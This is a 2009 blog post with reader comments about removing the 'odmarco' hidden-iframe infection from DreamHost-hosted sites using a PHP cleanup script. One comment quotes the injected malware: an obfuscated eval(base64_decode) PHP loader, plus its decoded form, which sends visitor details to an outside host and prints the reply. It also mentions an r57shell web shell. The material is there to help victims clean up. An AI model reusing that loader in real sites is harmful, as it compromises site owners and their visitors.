Cleaning "infected" file from the odmarco string
I use DreamHost for quite some sites, both my own and of friends. Recently I got informed that one of my sites was triggering a warning in anti-virus software and when I went to investigate, it turned out quite a few sites got hit by an annoying script that inserts a hidden iframe. Removing all those by hand would be an annoying job, so I decided to automate it. Given that I don't know much shell scripting but have a firm knowledge of PHP, I decided to give that a go.
First of all, let's look at the hack. At this point I am unsure what exactly caused so many of my files to contain the odmarco string. It looks like quite some people on DreamHost got hit by this problem, so I am guessing a vulnerable script on one of their servers caused this. Now, I should blame myself as well, because apparently I didn't take notice to a lot of files in my websites being writable by the server. It's no excuse, but a lot of the sites that I have are very old sites, where I definitely didn't pay as much attention to such details as I do now.
Anyway, from a comment on siteadvisor I learned that the script called in the iframe is trying to abuse an exploit in Adobe Acrobat. Though I hate all stuff like this, I hate exploits more than mere referrer spam injection, so I felt I needed to take care of this quickly, even if a lot of the sites are hardly maintained anymore. So I sat down to hack up a little PHP script that would remove the offending string. Why PHP? Simple, it's the only language I know good enough to hack something like this up in a short time.
After some hacking around I came up with this script. It's not perfect, but it does the job and it does it well, so I'm happy. Anyone interested, feel free to use this script to clear up the mess in your site. It's meant to be run from the command line, inside the directory that you want to (recursively) clean. What I did was put it in the homedir on DreamHost, and then go into a directory that needed cleaning and issue the command:
/usr/local/php5/bin/php ../clear_odmarco.php
As you notice, at DreamHost you need to explicitly specify the php5 path because for some reason, the "php" command still defaults to php4. Then I put in a relative path to the clear_odmarco.php file (you could put the full path if you want).
April 12, 2009 - tags: odmarco, script, virus, malware, clear, dreamhost, php
Comments
Silvano Girardi Jr.: I had the same problem too. But it wasn't only the iframe, which for me was pointing to google- stats.com instead.I posted about it on my blog, but it is in portuguese: http://www.silvano.pro.br/2009/04/10/recomeco/
Let me list these items in English here:
1 - the hidden frame
2 - .htaccess modified to redirect all search engine bots to the cracker's website
3 - malicious PHP code generating random links
eval(base64_decode(’JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=’));
the decode results in:
$ch=curl_init(”http://usr-52. adsl .md/inc2.php?host=”.urlencode($_SERVER["HTTP_HOST"]).”&ip=”.urlencode($_SERVER["REMOTE_ADDR"]).”&agent=”.urlencode($_SERVER["HTTP_USER_AGENT"])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;
4 - lots of pages modified with the malicious cod on the top
The variable name and value changes for every file.
5 - there was a wp-content/cache.php file, which was actually a php shell called r57shell
6 - there was a big binary file called "core" which I didn't know what it was about.
There were probably more changes, so I decided to get rid of just everything and start from scratch.
Btw, I lost my pagerank too
Regards
April 13, 2009
GIF_Tom: Hi, we seem to be having the same problem over here with Odmarco and Dream Host. Funny enough when we asked them for support they directed us to your site. We downloaded the script but we seem to be having trouble executing it. Can you dumb down your explanation for us novice folks. Thanks so much!
May 5, 2009
left: Hi GIF_Tom,Could you explain what problems you are having? Any errors? Or what exactly is unclear? I'd be glad to help you. Feel free to e-mail me via the 'who' option in the menu
Stefan
May 6, 2009
Bill: You can scrub the iframe from html files quickly from the command line with this oneliner.find . -name '*.html' -print0 | xargs -0 perl -pi -e 'undef $/; s#
May 8, 2009
GIF_Tom: Hi Left, I went ahead and wrote you an email further explaining my issues. Just wanted to check in and see if you received it. It was very detailed. Any help you can give me on this subject will be great. If you did not receive it let me know and I will repost it in the comment field.GIF_Tom
May 9, 2009
lucia: Thank you, thank you, thank you.Odmarco changed the name of their image. So, I changed the string to be eliminated and named the script "nameofscript.com".
Then, I loaded the script to my top directory, and ran "http://mydomain.com/nameofscript.php" This worked like a charm. Even the command line averse can do it.
May 29, 2009
Chris Ramsey: You sir, are a life saver. As a PHP developer I should have thought about writing a script to do this but it never crossed my mind.Thanks so much for this!
May 30, 2009
Jack: Hi,This is a fantastic little script thankyou ever so much for this! It worked on 4 websites i have hosted with dreamhost but one gave me this error:
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in /home/promotions7/domainnamehere.com/clear_odmarco.php on line 7
I think it may be something to do with php4/php5 but im not sure how to specify the path for php5. If you could help i would be most grateful.
Many Thanks
Jack
June 2, 2009
left: Hi Jack,The error does look very much php4/php5 related. You can specify it to run php5 by using the full path as I mentioned it in my article (/usr/local/php5/bin/php)
Stefan
June 2, 2009
Jack: Hi Stefan,Thanks for the quick response. I should of mentioned thaat i was unable to get the script to work via custom command from my ftp (filezilla) as it keep reporting that "500 /USR/LOCAL/PHP5/BIN/PHP not understood".
I managed to enter the script into the directory and then run it via my browser "http://mydomainhere.com/clear_odmarco.php". This worked fine on all of my other sites! What am i doing wrong?
After being hit first in April i was hit once again last night...what a pest! Thank goodness for your post...
Kind Regards
- Jack
June 2, 2009
left: The script is meant to be run using an ssh connection into the server. via FTP this will not work. If you run it via the browser, it will probably be related to the fact that your domain runs php4. Try connection through ssh (using a client such as PuTTy for Windows). Be careful with what you do, obviously. The instructions above should suffice once you connect through ssh.
June 2, 2009
Dinesh: Hi,The link to the script file is broken. Can I please have the file. I have the same problem too and I'm on DH.
June 22, 2009
Dinesh: Aah well never mind.. I found d script from Google cache... June 22, 2009
Gordon: The CORE file is not a virus. It is part od Dreamhost's automation system!!! Do Not mess with it!!!----------------------
Thank you for this script.
I saw that your code link is dead, here's a link to a modified version I used to clean up an attack on Dreamhost (6/22/09):
http://forum.animejutsu.com/index.php?topic=116.0
June 23, 2009
Mik: Hi, good job on writing a script to help sort this out. Unfortunately the link to the script still seems to be broken...Mik.
July 23, 2009
Tim Eash: One of our sites was attacked with this "odmarco" infection, it was is running os commerce. I was able to use the script from the site and executed it and it works almost with out flaw. However, I am having a problem cleaning out the 4000 files, because when the script cleans, it leaves behind a "white spaces".What I mean by white spaces are I believe line breaks. I am not sure. If I hope the cleaned file with notepad I see "a square", but if I use an HTML editor to open it up, I see a newline.
But the new line is causing a problem because it's considered "output" and so my session is jacked.
"Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent"
Any idea's as to how I can scrub the infection and not leave a newline at the top of each script?
Thanks,
Tim
September 30, 2009
17-04-2010: